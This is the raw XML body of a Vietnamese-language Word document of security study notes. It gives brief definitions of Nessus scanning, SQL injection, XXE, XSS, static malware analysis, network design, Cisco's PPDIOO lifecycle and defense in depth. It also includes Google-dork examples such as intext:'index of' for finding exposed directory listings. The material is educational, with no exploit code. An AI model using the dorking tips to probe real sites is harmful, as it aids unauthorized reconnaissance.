        <w:t>Nessus cho phép lập lịch giám sát nhất quán bất kỳ tài nguyên mạng nào có thể truy cập bằng nền tảng giám sát bảo mật cập nhật nhất hiện có.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E148874" w14:textId="410AB8FC" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Searching for Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0941886F" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:r>
        <w:t>Google Hacking: sử dụng từ khóa để thực hiện search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321BBBA1" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:r>
        <w:t>VD: thêm site:microsoft.com vào key search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF9D6E4" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:r>
        <w:t>intext:"index of"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53675F95" w14:textId="6E257D8D" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:r>
        <w:t>=&gt; kết quả sẽ chắc chắn có index of</w:t>
      </w:r>
      <w:r>
        <w:cr/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4E7898" w14:textId="1E45974E" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECA3CF0" w14:textId="5F90A677" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B4F16FF" w14:textId="1D72DF39" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Web Application Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEA3CD6" w14:textId="248576D7" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Web Application Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF9A123" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:r>
        <w:t>Kiến trúc ứng dụng web mô tả sự tương tác giữa các ứng dụng, cơ sở dữ liệu db và</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA7975A" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:r>
        <w:t>các hệ thống phần mềm trung gian trên web. Kiến trúc ứng dụng có thể hoạt động</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B663727" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:r>
        <w:t>đồng thời và linh hoạt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5EBCBE" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:r>
        <w:t>Kiến trúc mạng có thể bảo vệ cung cấp một ngăn chặn và cô lập những kẻ tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2CE3E2" w14:textId="7D289A5A" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:r>
        <w:t>trong môi trường. Nó cũng cung cấp những nơi mà có thể rút lui và quan sát</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B6611D" w14:textId="525FF3BB" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781BC97B" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:r>
        <w:t>là một kỹ thuật lợi dụng những lỗ hổng về câu truy vấn của các ứng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0D7097" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:r>
        <w:t>dụng. Được thực hiện bằng cách chèn thêm một đoạn SQL để làm sai lệnh đi câu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A52E70" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>truy vấn ban đầu, từ đó có thể khai thác dữ liệu từ database. SQL injection có thể</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F379DF" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:r>
        <w:t>cho phép những kẻ tấn công thực hiện các thao tác như một người quản trị</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46162C9E" w14:textId="7794451D" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>web, trên cơ sở dữ liệu của ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2C5B5B" w14:textId="6D62113D" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>XML Entity Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE068A2" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRPr="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86A02">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hay còn được gọi là XXE injection là 1 lỗ hổng được đánh giá mức độ nghiêm trọng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581AEF5C" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRPr="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86A02">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>là 4/10 Web Application Security Risks của OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5D7477" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRPr="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86A02">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XXE là một lỗ hổng bảo mật web cho phép hacker tấn công can thiệp vào quá trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663C3E54" w14:textId="4FE8F11A" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86A02">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xử lý dữ liệu XML của application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E8F06B" w14:textId="537E8E8C" w:rsidR="00D86A02" w:rsidRPr="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Cross Site Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D493AC" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRPr="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86A02">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Là một trong những kỹ thuật tấn công phổ biến, được liệt vào danh sách những kỹ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3212B7" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRPr="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86A02">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thuật tấn công nguy hiểm nhất với ứng dụng web. Cross site scripting là một lỗi bảo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2204B92B" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRPr="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86A02">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mật cho phép người tấn công chèn các đoạn script nguy hiểm vào trong source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487A4DCC" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86A02">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>code ứng dụng web. Nhằm thực thi các đoạn mã độc JS để chiếm phiên đăng nhập</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86A02">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>của người dùng</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86A02">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:cr/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAF5F47" w14:textId="1309143F" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Malware Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5A62D1" w14:textId="7E3FC13F" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Static Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE5997A" w14:textId="15E7E1E2" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:r>
        <w:t>Phân tích tĩnh cơ bản bao gồm kiểm tra tệp thực thi mà không cần xem hướng dẫn thực tế. Phân tích tĩnh cơ bản có thể xác nhân xem một tệp có độc hại hay không, cung cấp thông tin về chức năng của nó và đôi khi cung cấp thông tin cho phép bạn tạo chữ ký mạng đơn giản. Phân tích tĩnh cơ bản rất đơn giản và có thể nhanh chóng, nhưng phần lớn nó không hiệu quả trước phần mềm độc hại tinh vi và nó có thể bỏ lỡ các hành vi quan trọng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD1541E" w14:textId="6F6EAA82" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Network Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E53F78" w14:textId="77777777" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:r>
        <w:t>Network design là thiết kế mạng - một thuật ngữ thuộc nhóm Technology Terms -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC0B1D7" w14:textId="77777777" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:r>
        <w:t>CNTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D735761" w14:textId="77777777" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:r>
        <w:t>Độ phổ biến: 5/10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEBE8A7" w14:textId="77777777" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:r>
        <w:t>Thiết kế mạng đề cập đến việc lập kế hoạch thi hành một cơ sở hạ tầng mạng máy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5148FBED" w14:textId="77777777" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>tính</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F581D8" w14:textId="77777777" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:r>
        <w:t>Giải thích ý nghĩa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0FC95A" w14:textId="77777777" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:r>
        <w:t>Thiết kế mạng liên quan đến việc đánh giá tìm hiểu và xác định phạm vi mạng được</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>thực hiện. Việc thiết kế toàn bộ mạng lưới thường được biểu diễn dưới dạng một sơ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>đồ mạng đóng vai trò như các kế hoạch chi tiết để thực hiện mạng vật lý.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28182F4F" w14:textId="6F4BACFA" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Yêu cầu thiết kế mạng , xác định yêu cầu thiết kế? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520B075B" w14:textId="3C93E7CC" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Xác định các ứng dụng và dịch vụ mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F73E53" w14:textId="77777777" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Các loại ứng dụng được lên kế hoạch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03902ADA" w14:textId="4A77DEFA" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Xác định mục tiêu của tổ chức</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2369C5EC" w14:textId="2BD2DEDB" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Xác định các ràng buộc và hạn chế có thể có của tổ chức</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0635EF6F" w14:textId="217B6922" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Xác định các mục tiêu kỹ thuật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A051DAB" w14:textId="73B1F2D6" w:rsidR="008D4626" w:rsidRPr="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Xác định các ràng buộc kỹ thuật có thể có</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3274FA6F" w14:textId="4C5B2E96" w:rsidR="008D4626" w:rsidRPr="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Mô tả mạng hiện có</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61171AF7" w14:textId="74654CB7" w:rsidR="008D4626" w:rsidRPr="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Xác định tất cả thông tin và tài liệu tổ chức hiện có</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3D03BA" w14:textId="543F254B" w:rsidR="008D4626" w:rsidRPr="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện kiểm tra mạng thêm chi tiết vào mô tả của mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15869161" w14:textId="3C1C6959" w:rsidR="008D4626" w:rsidRPr="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Thiết kế cấu trúc liên kết mạng và các giải pháp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29024DAE" w14:textId="5A32D389" w:rsidR="008D4626" w:rsidRPr="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Lập kế hoặc triển khai mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEA09CE" w14:textId="4E63D638" w:rsidR="008D4626" w:rsidRPr="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Xây dựng một mạng nguyên mẫu hoặc một trang web test thử nghiệm thiết kế mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671DF03B" w14:textId="2698C21F" w:rsidR="008D4626" w:rsidRPr="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Ghi lại đầy đủ các thiết kế tài liệu thiết kế mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5BD702" w14:textId="7649BFA3" w:rsidR="008D4626" w:rsidRPr="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện thiết kế</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0649C256" w14:textId="2D0173A0" w:rsidR="008D4626" w:rsidRPr="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Xác minh, giám sát và sửa đổi khi cần thiết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBD8649" w14:textId="51938C50" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>PPDIOO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247AAEDB" w14:textId="6C5AD5FB" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Là vòng đời mạng được xác định bởi Cisco. PPDIOO có sáu giai đoạn hoặc bước để thiết kế mạng và các giai đoạn thiết kế này như sau</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4626">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AE9DDAC" wp14:editId="18E9CD27">
            <wp:extent cx="5868219" cy="631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219" cy="6315956"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5F328D" w14:textId="77777777" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Chuẩn bị</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B22FC4D" w14:textId="77777777" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Kế hoạch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4835EED6" w14:textId="77777777" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Thiết kế</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581871EA" w14:textId="77777777" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD7069C" w14:textId="77777777" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Hành quân</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CFDDB7" w14:textId="20255807" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Tối ưu hóa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE5E739" w14:textId="7A808BF5" w:rsidR="008D4626" w:rsidRPr="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Defensible Network Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3869C5BD" w14:textId="77777777" w:rsidR="008D4626" w:rsidRPr="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4626">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Phòng thủ theo chiều sâu đề cập đến một chiến lược an ninh mạng trong đó có</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD3C657" w14:textId="77777777" w:rsidR="008D4626" w:rsidRPr="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4626">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>nhiều sản phẩm và phương pháp được sử dụng để bảo vệ mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736CD9E9" w14:textId="77777777" w:rsidR="008D4626" w:rsidRPr="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4626">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Phòng thủ theo chiều sâu (DID) là một chiến lược an ninh mạng sử dụng nhiều sản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F0A579" w14:textId="77777777" w:rsidR="008D4626" w:rsidRPr="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4626">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phẩm và phương pháp bảo mật để bảo vệ mạng, thuộc tính web và tài nguyên của</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7808E719" w14:textId="77777777" w:rsidR="008D4626" w:rsidRPr="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4626">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>một tổ chức. Nó đôi khi được sử dụng thay thế cho nhau với thuật ngữ ‘bảo mật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53407F27" w14:textId="21903F45" w:rsidR="008D4626" w:rsidRDefault="008D4626" w:rsidP="008D4626">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4626">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nhiều lớp’ vì nó phụ thuộc vào các giải pháp bảo mật ở nhiều lớp kiểm soát - vật lý,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D4626">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kỹ thuật và quản trị - để ngăn những kẻ tấn công tiếp cận mạng được bảo vệ hoặc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D4626">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tài nguyên tại chỗ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D80E49" w14:textId="3CA8E6A7" w:rsidR="00A27DF0" w:rsidRDefault="00A27DF0" w:rsidP="008D4626">
